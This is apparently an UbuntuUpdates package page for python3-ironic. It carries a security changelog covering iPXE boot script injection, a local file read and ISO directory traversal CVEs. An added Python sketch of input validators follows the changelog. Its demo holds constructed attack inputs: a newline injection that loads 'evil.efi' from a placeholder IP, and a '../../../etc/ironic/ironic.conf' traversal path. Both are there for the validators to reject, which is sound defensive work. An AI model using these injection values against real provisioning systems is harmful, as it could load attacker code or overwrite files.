UbuntuUpdates.org

Package "python3-ironic"

Name: python3-ironic

Description:

Openstack bare metal provisioning service - Python 3 library

Latest version: 1:24.1.1-0ubuntu1.3
Release: noble (24.04)
Level: security
Repository: universe
Head package: ironic
Homepage: https://opendev.org/openstack/ironic

Other versions of "python3-ironic" in Noble

Repository   Area       Version
base         universe   1:24.1.1-0ubuntu1
updates      universe   1:24.1.1-0ubuntu1.3

Changelog

Version: 1:24.1.1-0ubuntu1.3 2026-06-11 22:07:54 UTC

  ironic (1:24.1.1-0ubuntu1.3) noble-security; urgency=medium

  * SECURITY UPDATE: sanitize kernel_append_params to prevent injection
    - d/p/cve-2026-46447-sanitize-kernel-append-params.patch: Validate
      kernel_append_params against a kernel command line grammar and
      reject malformed parameters. Add disable_kernel_parameter_parsing
      config option.
    - CVE-2026-46447
  * SECURITY UPDATE: disable insecure driver_info pxe_template override
    - d/p/lp2148319-disable-pxe-template-override.patch: Remove direct
      file path support for pxe_template to prevent privilege escalation.
    - CVE-2026-44917
  * SECURITY UPDATE: prevent directory traversal in ISO9660 image handling
    - d/p/lp2148333-directory-traversal-iso9660.patch: Validate ISO9660
      path entries to reject directory traversal attempts in config drive
      ISO images.
    - CVE-2026-48681

 -- Hemanth Nakkina <email address hidden> Wed, 03 Jun 2026 14:49:43 +0530

CVE-2026-46447 OpenStack Ironic before 35.0.2 allows Boot Script Injection of an iPXE script if the attacker can set node.driver_info or node.instance_info.
CVE-2026-44917 OpenStack Ironic before 35.0.2 allows a malicious authenticated project admin or manager to read local files on the Ironic conductor via a pxe_templa
CVE-2026-48681 OpenStack Ironic before 35.0.2 allows file overwrite via directory traversal during deployment with a crafted ISO image.
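All three fixes in this upload are input validation on node fields a project admin or manager can set. As an added example, not Ironic's code and not the Ubuntu patches, the Python below sketches two of those checks: a kernel command line grammar applied to kernel_append_params, so that a newline or other control character can never start a new line in the rendered iPXE script, and a containment check for ISO9660 directory entries before anything is written under a destination directory. The grammar itself (modelled loosely on how the Linux kernel splits its own command line), the function names, the destination path /var/lib/ironic/cd and the sample inputs are all assumptions made for the example.

```python
import posixpath
import re

# Hypothetical grammar (not Ironic's actual patch): space/tab separated
# key[=value] tokens, values optionally double-quoted, printable ASCII only.
_TOKEN_RE = re.compile(
    r'^[A-Za-z0-9_.:/+,@-]+'          # parameter name, e.g. systemd.unit
    r'(?:=(?:"[^"]*"|[^\s"]*))?$'     # optional =value, quoted or bare
)


def split_kernel_params(cmdline):
    """Split on spaces/tabs outside double quotes; reject unbalanced quotes."""
    tokens, buf, in_quote = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
            buf.append(ch)
        elif ch in ' \t' and not in_quote:
            if buf:
                tokens.append(''.join(buf))
                buf = []
        else:
            buf.append(ch)
    if in_quote:
        raise ValueError('unterminated double quote in kernel_append_params')
    if buf:
        tokens.append(''.join(buf))
    return tokens


def validate_kernel_append_params(cmdline):
    """Return the accepted tokens of cmdline, or raise ValueError."""
    # Reject every control character first: a newline here would otherwise
    # become a new command in the iPXE script the parameters are rendered into.
    for ch in cmdline:
        if not (0x20 <= ord(ch) <= 0x7e or ch == '\t'):
            raise ValueError('non-printable character %r in kernel_append_params' % ch)
    tokens = split_kernel_params(cmdline)
    for tok in tokens:
        if not _TOKEN_RE.match(tok):
            raise ValueError('malformed kernel parameter %r' % tok)
    return tokens


def safe_iso_member_path(dest_root, member):
    """Map an ISO9660 directory entry onto dest_root, or raise ValueError.

    Hypothetical check (not Ironic's patch). Entry paths are rooted at the
    image, so a leading '/' is the image root, not the host root; after
    dropping it, reject NUL bytes, backslashes and any '..' component, then
    confirm the normalised target still lies at or below dest_root.
    """
    if '\x00' in member or '\\' in member:
        raise ValueError('illegal character in ISO path %r' % member)
    parts = [p for p in member.split('/') if p not in ('', '.')]
    if '..' in parts:
        raise ValueError('directory traversal in ISO image: %r' % member)
    root = posixpath.normpath(dest_root)
    target = posixpath.normpath(posixpath.join(root, *parts))
    prefix = root if root.endswith('/') else root + '/'
    if target != root and not target.startswith(prefix):
        raise ValueError('path %r escapes %s' % (member, root))
    return target


def rejects(fn, *args):
    """True if fn(*args) raises ValueError (used by demo())."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


def demo():
    """Run constructed benign and malicious inputs through both checks."""
    good_params = 'console=ttyS0,115200n8 root="UUID=1234 abcd" nomodeset'
    # Constructed attacker input: a newline to break out into a new iPXE line.
    bad_params = 'console=tty0\nkernel http://198.51.100.7/evil.efi'
    return {
        'params_ok': validate_kernel_append_params(good_params),
        'newline_rejected': rejects(validate_kernel_append_params, bad_params),
        'unquoted_rejected': rejects(validate_kernel_append_params, 'root="x'),
        'bad_quote_rejected': rejects(validate_kernel_append_params, 'console="tty0"x'),
        'iso_ok': safe_iso_member_path('/var/lib/ironic/cd',
                                       '/OPENSTACK/LATEST/META_DATA.JSON'),
        'iso_traversal_rejected': rejects(safe_iso_member_path, '/var/lib/ironic/cd',
                                          '../../../etc/ironic/ironic.conf'),
    }


if __name__ == '__main__':
    for name, result in demo().items():
        print('%-24s %r' % (name, result))
```

Rejecting control characters before tokenising is the part that matters for the iPXE injection: a grammar that only split on whitespace would happily treat the attacker's second line as more key=value tokens. For the ISO case, the `..` check alone is not enough on its own once symlinks or odd separators are in play, which is why the example also confirms the normalised target sits under the destination root.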

Version: 1:24.1.1-0ubuntu1.2 2024-09-04 18:07:01 UTC

  ironic (1:24.1.1-0ubuntu1.2) noble-security; urgency=medium

  * SECURITY UPDATE: ensure underlying environment details not leaked when a
    maliciously crafted image is used (LP: #2071740).
    - d/p/CVE-2024-44082.patch: Harden all image handling and conversion code.
    - d/control: Add qemu-utils to Build-Depends to allow unit tests to run
      qemu-img.
    - CVE-2024-44082

 -- Felipe Reyes <email address hidden> Tue, 03 Sep 2024 16:06:12 +0100

2071740 [OSSA-2024-003] Unvalidated image data passed to qemu-img (CVE-2024-44082)